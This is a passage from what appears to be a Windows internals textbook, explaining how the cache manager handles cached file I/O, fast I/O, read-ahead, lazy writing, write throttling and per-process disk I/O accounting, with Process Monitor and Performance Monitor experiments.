allocate a VACB index array with 128,000 entries, or the equivalent of 1,000
VACB index arrays.
File system interfaces
The first time a file’s data is accessed for a cached read or write operation,
the file system driver is responsible for determining whether some part of the
file is mapped in the system cache. If it’s not, the file system driver must call
the CcInitializeCacheMap function to set up the per-file data structures
described in the preceding section.
Once a file is set up for cached access, the file system driver calls one of
several functions to access the data in the file. There are three primary
methods for accessing cached data, each intended for a specific situation:
■ The copy method copies user data between cache buffers in system
space and a process buffer in user space.
■ The mapping and pinning method uses virtual addresses to read and
write data directly from and to cache buffers.
■ The physical memory access method uses physical addresses to read
and write data directly from and to cache buffers.
File system drivers must provide two versions of the file read operation—
cached and noncached—to prevent an infinite loop when the memory
manager processes a page fault. When the memory manager resolves a page
fault by calling the file system to retrieve data from the file (via the device
driver, of course), it must specify this as a paging read operation by setting
the “no cache” and “paging IO” flags in the IRP.
Figure 11-11 illustrates the typical interactions between the cache
manager, the memory manager, and file system drivers in response to user
read or write file I/O. The cache manager is invoked by a file system through
the copy interfaces (the CcCopyRead and CcCopyWrite paths). To process a
CcFastCopyRead or CcCopyRead read, for example, the cache manager
creates a view in the cache to map a portion of the file being read and reads
the file data into the user buffer by copying from the view. The copy
operation generates page faults as it accesses each previously invalid page in
the view, and in response the memory manager initiates noncached I/O into
the file system driver to retrieve the data corresponding to the part of the file
mapped to the page that faulted.
Figure 11-11 File system interaction with cache and memory managers.
The next three sections explain these cache access mechanisms, their
purpose, and how they’re used.
Copying to and from the cache
Because the system cache is in system space, it’s mapped into the address
space of every process. As with all system space pages, however, cache pages
aren’t accessible from user mode because that would be a potential security
hole. (For example, a process might not have the rights to read a file whose
data is currently contained in some part of the system cache.) Thus, user
application file reads and writes to cached files must be serviced by kernel-
mode routines that copy data between the cache’s buffers in system space and
the application’s buffers residing in the process address space.
Caching with the mapping and pinning interfaces
Just as user applications read and write data in files on a disk, file system
drivers need to read and write the data that describes the files themselves (the
metadata, or volume structure data). Because the file system drivers run in
kernel mode, however, they could, if the cache manager were properly
informed, modify data directly in the system cache. To permit this
optimization, the cache manager provides functions that permit the file
system drivers to find where in virtual memory the file system metadata
resides, thus allowing direct modification without the use of intermediary
buffers.
If a file system driver needs to read file system metadata in the cache, it
calls the cache manager’s mapping interface to obtain the virtual address of
the desired data. The cache manager touches all the requested pages to bring
them into memory and then returns control to the file system driver. The file
system driver can then access the data directly.
If the file system driver needs to modify cache pages, it calls the cache
manager’s pinning services, which keep the pages active in virtual memory
so that they can’t be reclaimed. The pages aren’t actually locked into
memory (such as when a device driver locks pages for direct memory access
transfers). Most of the time, a file system driver will mark its metadata
stream as no write, which instructs the memory manager’s mapped page
writer (explained in Chapter 5 of Part 1) to not write the pages to disk until
explicitly told to do so. When the file system driver unpins (releases) them,
the cache manager releases its resources so that it can lazily flush any
changes to disk and release the cache view that the metadata occupied.
The mapping and pinning interfaces solve one thorny problem of
implementing a file system: buffer management. Without directly
manipulating cached metadata, a file system must predict the maximum
number of buffers it will need when updating a volume’s structure. By
allowing the file system to access and update its metadata directly in the
cache, the cache manager eliminates the need for buffers, simply updating
the volume structure in the virtual memory the memory manager provides.
The only limitation the file system encounters is the amount of available
memory.
Caching with the direct memory access interfaces
In addition to the mapping and pinning interfaces used to access metadata
directly in the cache, the cache manager provides a third interface to cached
data: direct memory access (DMA). The DMA functions are used to read
from or write to cache pages without intervening buffers, such as when a
network file system is doing a transfer over the network.
The DMA interface returns to the file system the physical addresses of
cached user data (rather than the virtual addresses, which the mapping and
pinning interfaces return), which can then be used to transfer data directly
from physical memory to a network device. Although small amounts of data
(1 KB to 2 KB) can use the usual buffer-based copying interfaces, for larger
transfers the DMA interface can result in significant performance
improvements for a network server processing file requests from remote
systems. To describe these references to physical memory, a memory
descriptor list (MDL) is used. (MDLs are introduced in Chapter 5 of Part 1.)
Fast I/O
Whenever possible, reads and writes to cached files are handled by a high-
speed mechanism named fast I/O. Fast I/O is a means of reading or writing a
cached file without going through the work of generating an IRP. With fast
I/O, the I/O manager calls the file system driver’s fast I/O routine to see
whether I/O can be satisfied directly from the cache manager without
generating an IRP.
Because the cache manager is architected on top of the virtual memory
subsystem, file system drivers can use the cache manager to access file data
simply by copying to or from pages mapped to the actual file being
referenced without going through the overhead of generating an IRP.
Fast I/O doesn’t always occur. For example, the first read or write to a file
requires setting up the file for caching (mapping the file into the cache and
setting up the cache data structures, as explained earlier in the section “Cache
data structures”). Also, if the caller specified an asynchronous read or write,
fast I/O isn’t used because the caller might be stalled during paging I/O
operations required to satisfy the buffer copy to or from the system cache and
thus not really providing the requested asynchronous I/O operation. But even
on a synchronous I/O operation, the file system driver might decide that it
can’t process the I/O operation by using the fast I/O mechanism—say, for
example, if the file in question has a locked range of bytes (as a result of calls
to the Windows LockFile and UnlockFile functions). Because the cache
manager doesn’t know what parts of which files are locked, the file system
driver must check the validity of the read or write, which requires generating
an IRP. The decision tree for fast I/O is shown in Figure 11-12.
Figure 11-12 Fast I/O decision tree.
These steps are involved in servicing a read or a write with fast I/O:
1.
A thread performs a read or write operation.
2.
If the file is cached and the I/O is synchronous, the request passes to
the fast I/O entry point of the file system driver stack. If the file isn’t
cached, the file system driver sets up the file for caching so that the
next time, fast I/O can be used to satisfy a read or write request.
3.
If the file system driver’s fast I/O routine determines that fast I/O is
possible, it calls the cache manager’s read or write routine to access
the file data directly in the cache. (If fast I/O isn’t possible, the file
system driver returns to the I/O system, which then generates an IRP
for the I/O and eventually calls the file system’s regular read routine.)
4.
The cache manager translates the supplied file offset into a virtual
address in the cache.
5.
For reads, the cache manager copies the data from the cache into the
buffer of the process requesting it; for writes, it copies the data from
the buffer to the cache.
6.
One of the following actions occurs:
• For reads where FILE_FLAG_RANDOM_ACCESS wasn’t
specified when the file was opened, the read-ahead information in
the caller’s private cache map is updated. Read-ahead may also be
queued for files for which the FO_RANDOM_ACCESS flag is not
specified.
• For writes, the dirty bit of any modified page in the cache is set so
that the lazy writer will know to flush it to disk.
• For write-through files, any modifications are flushed to disk.
Read-ahead and write-behind
In this section, you’ll see how the cache manager implements reading and
writing file data on behalf of file system drivers. Keep in mind that the cache
manager is involved in file I/O only when a file is opened without the
FILE_FLAG_NO_BUFFERING flag and then read from or written to using
the Windows I/O functions (for example, using the Windows ReadFile and
WriteFile functions). Mapped files don’t go through the cache manager, nor
do files opened with the FILE_FLAG_NO_BUFFERING flag set.
Note
When an application uses the FILE_FLAG_NO_BUFFERING flag to
open a file, its file I/O must start at device-aligned offsets and be of sizes
that are a multiple of the alignment size; its input and output buffers must
also be device-aligned virtual addresses. For file systems, this usually
corresponds to the sector size (4,096 bytes on NTFS, typically, and 2,048
bytes on CDFS). One of the benefits of the cache manager, apart from the
actual caching performance, is the fact that it performs intermediate
buffering to allow arbitrarily aligned and sized I/O.
Intelligent read-ahead
The cache manager uses the principle of spatial locality to perform intelligent
read-ahead by predicting what data the calling process is likely to read next
based on the data that it’s reading currently. Because the system cache is
based on virtual addresses, which are contiguous for a particular file, it
doesn’t matter whether they’re juxtaposed in physical memory. File read-
ahead for logical block caching is more complex and requires tight
cooperation between file system drivers and the block cache because that
cache system is based on the relative positions of the accessed data on the
disk, and, of course, files aren’t necessarily stored contiguously on disk. You
can examine read-ahead activity by using the Cache: Read Aheads/sec
performance counter or the CcReadAheadIos system variable.
Reading the next block of a file that is being accessed sequentially
provides an obvious performance improvement, with the disadvantage that it
will cause head seeks. To extend read-ahead benefits to cases of stridden data
accesses (both forward and backward through a file), the cache manager
maintains a history of the last two read requests in the private cache map for
the file handle being accessed, a method known as asynchronous read-ahead
with history. If a pattern can be determined from the caller’s apparently
random reads, the cache manager extrapolates it. For example, if the caller
reads page 4,000 and then page 3,000, the cache manager assumes that the
next page the caller will require is page 2,000 and prereads it.
Note
Although a caller must issue a minimum of three read operations to
establish a predictable sequence, only two are stored in the private cache
map.
To make read-ahead even more efficient, the Win32 CreateFile function
provides a flag indicating forward sequential file access:
FILE_FLAG_SEQUENTIAL_SCAN. If this flag is set, the cache manager
doesn’t keep a read history for the caller for prediction but instead performs
sequential read-ahead. However, as the file is read into the cache’s working
set, the cache manager unmaps views of the file that are no longer active and,
if they are unmodified, directs the memory manager to place the pages
belonging to the unmapped views at the front of the standby list so that they
will be quickly reused. It also reads ahead two times as much data (2 MB
instead of 1 MB, for example). As the caller continues reading, the cache
manager prereads additional blocks of data, always staying about one read
(of the size of the current read) ahead of the caller.
The cache manager’s read-ahead is asynchronous because it’s performed
in a thread separate from the caller’s thread and proceeds concurrently with
the caller’s execution. When called to retrieve cached data, the cache
manager first accesses the requested virtual page to satisfy the request and
then queues an additional I/O request to retrieve additional data to a system
worker thread. The worker thread then executes in the background, reading
additional data in anticipation of the caller’s next read request. The preread
pages are faulted into memory while the program continues executing so that
when the caller requests the data it’s already in memory.
For applications that have no predictable read pattern, the
FILE_FLAG_RANDOM_ACCESS flag can be specified when the CreateFile
function is called. This flag instructs the cache manager not to attempt to
predict where the application is reading next and thus disables read-ahead.
The flag also stops the cache manager from aggressively unmapping views of
the file as the file is accessed so as to minimize the mapping/unmapping
activity for the file when the application revisits portions of the file.
Read-ahead enhancements
Windows 8.1 introduced some enhancements to the cache manager read-
ahead functionality. File system drivers and network redirectors can decide
the size and growth for the intelligent read-ahead with the
CcSetReadAheadGranularityEx API function. The cache manager client can
decide the following:
■ Read-ahead granularity Sets the minimum read-ahead unit size and
the end file-offset of the next read-ahead. The cache manager sets the
default granularity to 4 Kbytes (the size of a memory page), but every
file system sets this value in a different way (NTFS, for example, sets
the cache granularity to 64 Kbytes).
Figure 11-13 shows an example of read-ahead on a 200 Kbyte-sized
file, where the cache granularity has been set to 64 KB. If the user
requests a nonaligned 1 KB read at offset 0x10800, and if a sequential
read has already been detected, the intelligent read-ahead will emit an
I/O that encompasses the 64 KB of data from offset 0x10000 to
0x20000. If there were already more than two sequential reads, the
cache manager emits another supplementary read from offset
0x20000 to offset 0x30000 (192 Kbytes).
Figure 11-13 Read-ahead on a 200 KB file, with granularity set to
64KB.
■ Pipeline size For some remote file system drivers, it may make sense
to split large read-ahead I/Os into smaller chunks, which will be
emitted in parallel by the cache manager worker threads. A network
file system can achieve a substantial better throughput using this
technique.
■ Read-ahead aggressiveness File system drivers can specify the
percentage used by the cache manager to decide how to increase the
read-ahead size after the detection of a third sequential read. For
example, let’s assume that an application is reading a big file using a
1 Mbyte I/O size. After the tenth read, the application has already
read 10 Mbytes (the cache manager may have already prefetched
some of them). The intelligent read-ahead now decides by how much
to grow the read-ahead I/O size. If the file system has specified 60%
of growth, the formula used is the following:
(Number of sequential reads * Size of last read) * (Growth percentage
/ 100)
So, this means that the next read-ahead size is 6 MB (instead of being
2 MB, assuming that the granularity is 64 KB and the I/O size is 1
MB). The default growth percentage is 50% if not modified by any
cache manager client.
Write-back caching and lazy writing
The cache manager implements a write-back cache with lazy write. This
means that data written to files is first stored in memory in cache pages and
then written to disk later. Thus, write operations are allowed to accumulate
for a short time and are then flushed to disk all at once, reducing the overall
number of disk I/O operations.
The cache manager must explicitly call the memory manager to flush
cache pages because otherwise the memory manager writes memory contents
to disk only when demand for physical memory exceeds supply, as is
appropriate for volatile data. Cached file data, however, represents
nonvolatile disk data. If a process modifies cached data, the user expects the
contents to be reflected on disk in a timely manner.
Additionally, the cache manager has the ability to veto the memory
manager’s mapped writer thread. Since the modified list (see Chapter 5 of
Part 1 for more information) is not sorted in logical block address (LBA)
order, the cache manager’s attempts to cluster pages for larger sequential
I/Os to the disk are not always successful and actually cause repeated seeks.
To combat this effect, the cache manager has the ability to aggressively veto
the mapped writer thread and stream out writes in virtual byte offset (VBO)
order, which is much closer to the LBA order on disk. Since the cache
manager now owns these writes, it can also apply its own scheduling and
throttling algorithms to prefer read-ahead over write-behind and impact the
system less.
The decision about how often to flush the cache is an important one. If the
cache is flushed too frequently, system performance will be slowed by
unnecessary I/O. If the cache is flushed too rarely, you risk losing modified
file data in the cases of a system failure (a loss especially irritating to users
who know that they asked the application to save the changes) and running
out of physical memory (because it’s being used by an excess of modified
pages).
To balance these concerns, the cache manager’s lazy writer scan function
executes on a system worker thread once per second. The lazy writer scan
has different duties:
■ Checks the number of average available pages and dirty pages (that
belongs to the current partition) and updates the dirty page threshold’s
bottom and the top limits accordingly. The threshold itself is updated
too, primarily based on the total number of dirty pages written in the
previous cycle (see the following paragraphs for further details). It
sleeps if there are no dirty pages to write.
■ Calculates the number of dirty pages to write to disk through the
CcCalculatePagesToWrite internal routine. If the number of dirty
pages is more than 256 (1 MB of data), the cache manager queues
one-eighth of the total dirty pages to be flushed to disk. If the rate at
which dirty pages are being produced is greater than the amount the
lazy writer had determined it should write, the lazy writer writes an
additional number of dirty pages that it calculates are necessary to
match that rate.
■ Cycles between each shared cache map (which are stored in a linked
list belonging to the current partition), and, using the internal
CcShouldLazyWriteCacheMap routine, determines if the current file
described by the shared cache map needs to be flushed to disk. There
are different reasons why a file shouldn’t be flushed to disk: for
example, an I/O could have been already initialized by another thread,
the file could be a temporary file, or, more simply, the cache map
might not have any dirty pages. In case the routine determined that the
file should be flushed out, the lazy writer scan checks whether there
are still enough available pages to write, and, if so, posts a work item
to the cache manager system worker threads.
Note
The lazy writer scan uses some exceptions while deciding the number of
dirty pages mapped by a particular shared cache map to write (it doesn’t
always write all the dirty pages of a file): If the target file is a metadata
stream with more than 256 KB of dirty pages, the cache manager writes
only one-eighth of its total pages. Another exception is used for files that
have more dirty pages than the total number of pages that the lazy writer
scan can flush.
Lazy writer system worker threads from the systemwide critical worker
thread pool actually perform the I/O operations. The lazy writer is also aware
of when the memory manager’s mapped page writer is already performing a
flush. In these cases, it delays its write-back capabilities to the same stream
to avoid a situation where two flushers are writing to the same file.
Note
The cache manager provides a means for file system drivers to track when
and how much data has been written to a file. After the lazy writer flushes
dirty pages to the disk, the cache manager notifies the file system,
instructing it to update its view of the valid data length for the file. (The
cache manager and file systems separately track in memory the valid data
length for a file.)
EXPERIMENT: Watching the cache manager in
action
In this experiment, we use Process Monitor to view the underlying
file system activity, including cache manager read-ahead and write-
behind, when Windows Explorer copies a large file (in this
example, a DVD image) from one local directory to another.
First, configure Process Monitor’s filter to include the source
and destination file paths, the Explorer.exe and System processes,
and the ReadFile and WriteFile operations. In this example, the
C:\Users\Andrea\Documents\Windows_10_RS3.iso file was copied
to C:\ISOs\ Windows_10_RS3.iso, so the filter is configured as
follows:
You should see a Process Monitor trace like the one shown here
after you copy the file:
The first few entries show the initial I/O processing performed
by the copy engine and the first cache manager operations. Here
are some of the things that you can see:
■ The initial 1 MB cached read from Explorer at the first
entry. The size of this read depends on an internal matrix
calculation based on the file size and can vary from 128 KB
to 1 MB. Because this file was large, the copy engine chose
1 MB.
■ The 1-MB read is followed by another 1-MB noncached
read. Noncached reads typically indicate activity due to
page faults or cache manager access. A closer look at the
stack trace for these events, which you can see by double-
clicking an entry and choosing the Stack tab, reveals that
indeed the CcCopyRead cache manager routine, which is
called by the NTFS driver’s read routine, causes the
memory manager to fault the source data into physical
memory:
■ After this 1-MB page fault I/O, the cache manager’s read-
ahead mechanism starts reading the file, which includes the
System process’s subsequent noncached 1-MB read at the
1-MB offset. Because of the file size and Explorer’s read
I/O sizes, the cache manager chose 1 MB as the optimal
read-ahead size. The stack trace for one of the read-ahead
operations, shown next, confirms that one of the cache
manager’s worker threads is performing the read-ahead.
After this point, Explorer’s 1-MB reads aren’t followed by page
faults, because the read-ahead thread stays ahead of Explorer,
prefetching the file data with its 1-MB noncached reads. However,
every once in a while, the read-ahead thread is not able to pick up
enough data in time, and clustered page faults do occur, which
appear as Synchronous Paging I/O.
If you look at the stack for these entries, you’ll see that instead
of MmPrefetchForCacheManager, the
MmAccessFault/MiIssueHardFault routines are called.
As soon as it starts reading, Explorer also starts performing
writes to the destination file. These are sequential, cached 1-MB
writes. After about 124 MB of reads, the first WriteFile operation
from the System process occurs, shown here:
The write operation’s stack trace, shown here, indicates that the
memory manager’s mapped page writer thread was actually
responsible for the write. This occurs because for the first couple of
megabytes of data, the cache manager hadn’t started performing
write-behind, so the memory manager’s mapped page writer began
flushing the modified destination file data. (See Chapter 10 for
more information on the mapped page writer.)
To get a clearer view of the cache manager operations, remove
Explorer from the Process Monitor’s filter so that only the System
process operations are visible, as shown next.
With this view, it’s much easier to see the cache manager’s 1-
MB write-behind operations (the maximum write sizes are 1 MB
on client versions of Windows and 32 MB on server versions; this
experiment was performed on a client system). The stack trace for
one of the write-behind operations, shown here, verifies that a
cache manager worker thread is performing write-behind:
As an added experiment, try repeating this process with a remote
copy instead (from one Windows system to another) and by
copying files of varying sizes. You’ll notice some different
behaviors by the copy engine and the cache manager, both on the
receiving and sending sides.
Disabling lazy writing for a file
If you create a temporary file by specifying the flag
FILE_ATTRIBUTE_TEMPORARY in a call to the Windows CreateFile
function, the lazy writer won’t write dirty pages to the disk unless there is a
severe shortage of physical memory or the file is explicitly flushed. This
characteristic of the lazy writer improves system performance—the lazy
writer doesn’t immediately write data to a disk that might ultimately be
discarded. Applications usually delete temporary files soon after closing
them.
Forcing the cache to write through to disk
Because some applications can’t tolerate even momentary delays between
writing a file and seeing the updates on disk, the cache manager also supports
write-through caching on a per-file object basis; changes are written to disk
as soon as they’re made. To turn on write-through caching, set the
FILE_FLAG_WRITE_THROUGH flag in the call to the CreateFile function.
Alternatively, a thread can explicitly flush an open file by using the Windows
FlushFileBuffers function when it reaches a point at which the data needs to
be written to disk.
Flushing mapped files
If the lazy writer must write data to disk from a view that’s also mapped into
another process’s address space, the situation becomes a little more
complicated because the cache manager will only know about the pages it has
modified. (Pages modified by another process are known only to that process
because the modified bit in the page table entries for modified pages is kept
in the process private page tables.) To address this situation, the memory
manager informs the cache manager when a user maps a file. When such a
file is flushed in the cache (for example, as a result of a call to the Windows
FlushFileBuffers function), the cache manager writes the dirty pages in the
cache and then checks to see whether the file is also mapped by another
process. When the cache manager sees that the file is also mapped by another
process, the cache manager then flushes the entire view of the section to write
out pages that the second process might have modified. If a user maps a view
of a file that is also open in the cache, when the view is unmapped, the
modified pages are marked as dirty so that when the lazy writer thread later
flushes the view, those dirty pages will be written to disk. This procedure
works as long as the sequence occurs in the following order:
1.
A user unmaps the view.
2.
A process flushes file buffers.
If this sequence isn’t followed, you can’t predict which pages will be
written to disk.
EXPERIMENT: Watching cache flushes
You can see the cache manager map views into the system cache
and flush pages to disk by running the Performance Monitor and
adding the Data Maps/sec and Lazy Write Flushes/sec counters.
(You can find these counters under the “Cache” group.) Then, copy
a large file from one location to another. The generally higher line
in the following screenshot shows Data Maps/sec, and the other
shows Lazy Write Flushes/sec. During the file copy, Lazy Write
Flushes/sec significantly increased.
Write throttling
The file system and cache manager must determine whether a cached write
request will affect system performance and then schedule any delayed writes.
First, the file system asks the cache manager whether a certain number of
bytes can be written right now without hurting performance by using the
CcCanIWrite function and blocking that write if necessary. For asynchronous
I/O, the file system sets up a callback with the cache manager for
automatically writing the bytes when writes are again permitted by calling
CcDeferWrite. Otherwise, it just blocks and waits on CcCanIWrite to
continue. Once it’s notified of an impending write operation, the cache
manager determines how many dirty pages are in the cache and how much
physical memory is available. If few physical pages are free, the cache
manager momentarily blocks the file system thread that’s requesting to write
data to the cache. The cache manager’s lazy writer flushes some of the dirty
pages to disk and then allows the blocked file system thread to continue. This
write throttling prevents system performance from degrading because of a
lack of memory when a file system or network server issues a large write
operation.
Note
The effects of write throttling are volume-aware, such that if a user is
copying a large file on, say, a RAID-0 SSD while also transferring a
document to a portable USB thumb drive, writes to the USB disk will not
cause write throttling to occur on the SSD transfer.
The dirty page threshold is the number of pages that the system cache will
allow to be dirty before throttling cached writers. This value is computed
when the cache manager partition is initialized (the system partition is
created and initialized at phase 1 of the NT kernel startup) and depends on
the product type (client or server). As seen in the previous paragraphs, two
other values are also computed—the top dirty page threshold and the bottom
dirty page threshold. Depending on memory consumption and the rate at
which dirty pages are being processed, the lazy writer scan calls the internal
function CcAdjustThrottle, which, on server systems, performs dynamic
adjustment of the current threshold based on the calculated top and bottom
values. This adjustment is made to preserve the read cache in cases of a
heavy write load that will inevitably overrun the cache and become throttled.
Table 11-1 lists the algorithms used to calculate the dirty page thresholds.
Table 11-1 Algorithms for calculating the dirty page thresholds
Product
Type
Dirty Page
Threshold
Top Dirty Page
Threshold
Bottom Dirty Page
Threshold
Client
Physical pages
/ 8
Physical pages / 8
Physical pages / 8
Server
Physical pages
/ 2
Physical pages / 2
Physical pages / 8
Write throttling is also useful for network redirectors transmitting data
over slow communication lines. For example, suppose a local process writes
a large amount of data to a remote file system over a slow 640 Kbps line. The
data isn’t written to the remote disk until the cache manager’s lazy writer
flushes the cache. If the redirector has accumulated lots of dirty pages that
are flushed to disk at once, the recipient could receive a network timeout
before the data transfer completes. By using the CcSetDirtyPageThreshold
function, the cache manager allows network redirectors to set a limit on the
number of dirty cache pages they can tolerate (for each stream), thus
preventing this scenario. By limiting the number of dirty pages, the redirector
ensures that a cache flush operation won’t cause a network timeout.
System threads
As mentioned earlier, the cache manager performs lazy write and read-ahead
I/O operations by submitting requests to the common critical system worker
thread pool. However, it does limit the use of these threads to one less than
the total number of critical system worker threads. In client systems, there are
5 total critical system worker threads, whereas in server systems there are 10.
Internally, the cache manager organizes its work requests into four lists
(though these are serviced by the same set of executive worker threads):
■ The express queue is used for read-ahead operations.
■ The regular queue is used for lazy write scans (for dirty data to flush),
write-behinds, and lazy closes.
■ The fast teardown queue is used when the memory manager is waiting
for the data section owned by the cache manager to be freed so that
the file can be opened with an image section instead, which causes
CcWriteBehind to flush the entire file and tear down the shared cache
map.
■ The post tick queue is used for the cache manager to internally
register for a notification after each “tick” of the lazy writer thread—
in other words, at the end of each pass.
To keep track of the work items the worker threads need to perform, the
cache manager creates its own internal per-processor look-aside list—a
fixed-length list (one for each processor) of worker queue item structures.
(Look-aside lists are discussed in Chapter 5 of Part 1.) The number of worker
queue items depends on system type: 128 for client systems, and 256 for
server systems. For cross-processor performance, the cache manager also
allocates a global look-aside list at the same sizes as just described.
Aggressive write behind and low-priority lazy
writes
With the goal of improving cache manager performance, and to achieve
compatibility with low-speed disk devices (like eMMC disks), the cache
manager lazy writer has gone through substantial improvements in Windows
8.1 and later.
As seen in the previous paragraphs, the lazy writer scan adjusts the dirty
page threshold and its top and bottom limits. Multiple adjustments are made
on the limits, by analyzing the history of the total number of available pages.
Other adjustments are performed to the dirty page threshold itself by
checking whether the lazy writer has been able to write the expected total
number of pages in the last execution cycle (one per second). If the total
number of written pages in the last cycle is less than the expected number
(calculated by the CcCalculatePagesToWrite routine), it means that the
underlying disk device was not able to support the generated I/O throughput,
so the dirty page threshold is lowered (this means that more I/O throttling is
performed, and some cache manager clients will wait when calling
CcCanIWrite API). In the opposite case, in which there are no remaining
pages from the last cycle, the lazy writer scan can easily raise the threshold.
In both cases, the threshold needs to stay inside the range described by the
bottom and top limits.
The biggest improvement has been made thanks to the Extra Write Behind
worker threads. In server SKUs, the maximum number of these threads is
nine (which corresponds to the total number of critical system worker threads
minus one), while in client editions it is only one. When a system lazy write
scan is requested by the cache manager, the system checks whether dirty
pages are contributing to memory pressure (using a simple formula that
verifies that the number of dirty pages are less than a quarter of the dirty page
threshold, and less than half of the available pages). If so, the systemwide
cache manager thread pool routine (CcWorkerThread) uses a complex
algorithm that determines whether it can add another lazy writer thread that
will write dirty pages to disk in parallel with the others.
To correctly understand whether it is possible to add another thread that
will emit additional I/Os, without getting worse system performance, the
cache manager calculates the disk throughput of the old lazy write cycles and
keeps track of their performance. If the throughput of the current cycles is
equal or better than the previous one, it means that the disk can support the
overall I/O level, so it makes sense to add another lazy writer thread (which
is called an Extra Write Behind thread in this case). If, on the other hand, the
current throughput is lower than the previous cycle, it means that the
underlying disk is not able to sustain additional parallel writes, so the Extra
Write Behind thread is removed. This feature is called Aggressive Write
Behind.
In Windows client editions, the cache manager enables an optimization
designed to deal with low-speed disks. When a lazy writer scan is requested,
and when the file system drivers write to the cache, the cache manager
employs an algorithm to decide if the lazy writers threads should execute at
low priority. (For more information about thread priorities, refer to Chapter 4
of Part 1.) The cache manager applies by-default low priority to the lazy
writers if the following conditions are met (otherwise, the cache manager still
uses the normal priority):
■ The caller is not waiting for the current lazy scan to be finished.
■ The total size of the partition’s dirty pages is less than 32 MB.
If the two conditions are satisfied, the cache manager queues the work
items for the lazy writers in the low-priority queue. The lazy writers are
started by a system worker thread, which executes at priority 6 – Lowest.
Furthermore, the lazy writer set its I/O priority to Lowest just before emitting
the actual I/O to the correct file-system driver.
Dynamic memory
As seen in the previous paragraph, the dirty page threshold is calculated
dynamically based on the available amount of physical memory. The cache
manager uses the threshold to decide when to throttle incoming writes and
whether to be more aggressive about writing behind.
Before the introduction of partitions, the calculation was made in the
CcInitializeCacheManager routine (by checking the
MmNumberOfPhysicalPages global value), which was executed during the
kernel’s phase 1 initialization. Now, the cache manager Partition’s
initialization function performs the calculation based on the available
physical memory pages that belong to the associated memory partition. (For
further details about cache manager partitions, see the section “Memory
partitions support,” earlier in this chapter.) This is not enough, though,
because Windows also supports the hot-addition of physical memory, a
feature that is deeply used by HyperV for supporting dynamic memory for
child VMs.
During memory manager phase 0 initialization, MiCreatePfnDatabase
calculates the maximum possible size of the PFN database. On 64-bit
systems, the memory manager assumes that the maximum possible amount
of installed physical memory is equal to all the addressable virtual memory
range (256 TB on non-LA57 systems, for example). The system asks the
memory manager to reserve the amount of virtual address space needed to
store a PFN for each virtual page in the entire address space. (The size of this
hypothetical PFN database is around 64 GB.) MiCreateSparsePfnDatabase
then cycles between each valid physical memory range that Winload has
detected and maps valid PFNs into the database. The PFN database uses
sparse memory. When the MiAddPhysicalMemory routines detect new
physical memory, it creates new PFNs simply by allocating new regions
inside the PFN databases. Dynamic Memory has already been described in
Chapter 9, “Virtualization technologies”; further details are available there.
The cache manager needs to detect the new hot-added or hot-removed
memory and adapt to the new system configuration, otherwise multiple
problems could arise:
■ In cases where new memory has been hot-added, the cache manager
might think that the system has less memory, so its dirty pages
threshold is lower than it should be. As a result, the cache manager
doesn’t cache as many dirty pages as it should, so it throttles writes
much sooner.
■ If large portions of available memory are locked or aren’t available
anymore, performing cached I/O on the system could hurt the
responsiveness of other applications (which, after the hot-remove,
will basically have no more memory).
To correctly deal with this situation, the cache manager doesn’t register a
callback with the memory manager but implements an adaptive correction in
the lazy writer scan (LWS) thread. Other than scanning the list of shared
cache map and deciding which dirty page to write, the LWS thread has the
ability to change the dirty pages threshold depending on foreground rate, its
write rate, and available memory. The LWS maintains a history of average
available physical pages and dirty pages that belong to the partition. Every
second, the LWS thread updates these lists and calculates aggregate values.
Using the aggregate values, the LWS is able to respond to memory size
variations, absorbing the spikes and gradually modifying the top and bottom
thresholds.
Cache manager disk I/O accounting
Before Windows 8.1, it wasn’t possible to precisely determine the total
amount of I/O performed by a single process. The reasons behind this were
multiple:
■ Lazy writes and read-aheads don’t happen in the context of the
process/thread that caused the I/O. The cache manager writes out the
data lazily, completing the write in a different context (usually the
System context) of the thread that originally wrote the file. (The
actual I/O can even happen after the process has terminated.)
Likewise, the cache manager can choose to read-ahead, bringing in
more data from the file than the process requested.
■ Asynchronous I/O is still managed by the cache manager, but there
are cases in which the cache manager is not involved at all, like for
non-cached I/Os.
■ Some specialized applications can emit low-level disk I/O using a
lower-level driver in the disk stack.
Windows stores a pointer to the thread that emitted the I/O in the tail of the
IRP. This thread is not always the one that originally started the I/O request.
As a result, a lot of times the I/O accounting was wrongly associated with the
System process. Windows 8.1 resolved the problem by introducing the
PsUpdateDiskCounters API, used by both the cache manager and file system
drivers, which need to tightly cooperate. The function stores the total number
of bytes read and written and the number of I/O operations in the core
EPROCESS data structure that is used by the NT kernel to describe a process.
(You can read more details in Chapter 3 of Part 1.)
The cache manager updates the process disk counters (by calling the
PsUpdateDiskCounters function) while performing cached reads and writes
(through all of its exposed file system interfaces) and while emitting read-
aheads I/O (through CcScheduleReadAheadEx exported API). NTFS and
ReFS file systems drivers call the PsUpdateDiskCounters while performing
non-cached and paging I/O.
Like CcScheduleReadAheadEx, multiple cache manager APIs have been
extended to accept a pointer to the thread that has emitted the I/O and should
be charged for it (CcCopyReadEx and CcCopyWriteEx are good examples).
In this way, updated file system drivers can even control which thread to
charge in case of asynchronous I/O.
Other than per-process counters, the cache manager also maintains a
Global Disk I/O counter, which globally keeps track of all the I/O that has
been issued by file systems to the storage stack. (The counter is updated
every time a non-cached and paging I/O is emitted through file system
drivers.) Thus, this global counter, when subtracted from the total I/O emitted
to a particular disk device (a value that an application can obtain by using the
IOCTL_DISK_PERFORMANCE control code), represents the I/O that could
not be attributed to any particular process (paging I/O emitted by the
Modified Page Writer for example, or I/O performed internally by Mini-filter
drivers).
The new per-process disk counters are exposed through the
NtQuerySystemInformation API using the SystemProcessInformation
information class. This is the method that diagnostics tools like Task
Manager or Process Explorer use for precisely querying the I/O numbers
related to the processes currently running in the system.
EXPERIMENT: Counting disk I/Os
You can see a precise counting of the total system I/Os by using the
different counters exposed by the Performance Monitor. Open
Performance Monitor and add the FileSystem Bytes Read and
FileSystem Bytes Written counters, which are available in the
FileSystem Disk Activity group. Furthermore, for this experiment
you need to add the per-process disk I/O counters that are available
in the Process group, named IO Read Bytes/sec and IO Write
Bytes/sec. When you add these last two counters, make sure that
you select the Explorer process in the Instances Of Selected Object
box.
When you start to copy a big file, you see the counters belonging
to Explorer processes increasing until they reach the counters
showed in the global file System Disk activity.
File systems
In this section, we present an overview of the supported file system formats
supported by Windows. We then describe the types of file system drivers and
their basic operation, including how they interact with other system
components, such as the memory manager and the cache manager. Following
that, we describe in detail the functionality and the data structures of the two
most important file systems: NTFS and ReFS. We start by analyzing their
internal architectures and then focus on the on-disk layout of the two file
systems and their advanced features, such as compression, recoverability,
encryption, tiering support, file-snapshot, and so on.
Windows file system formats
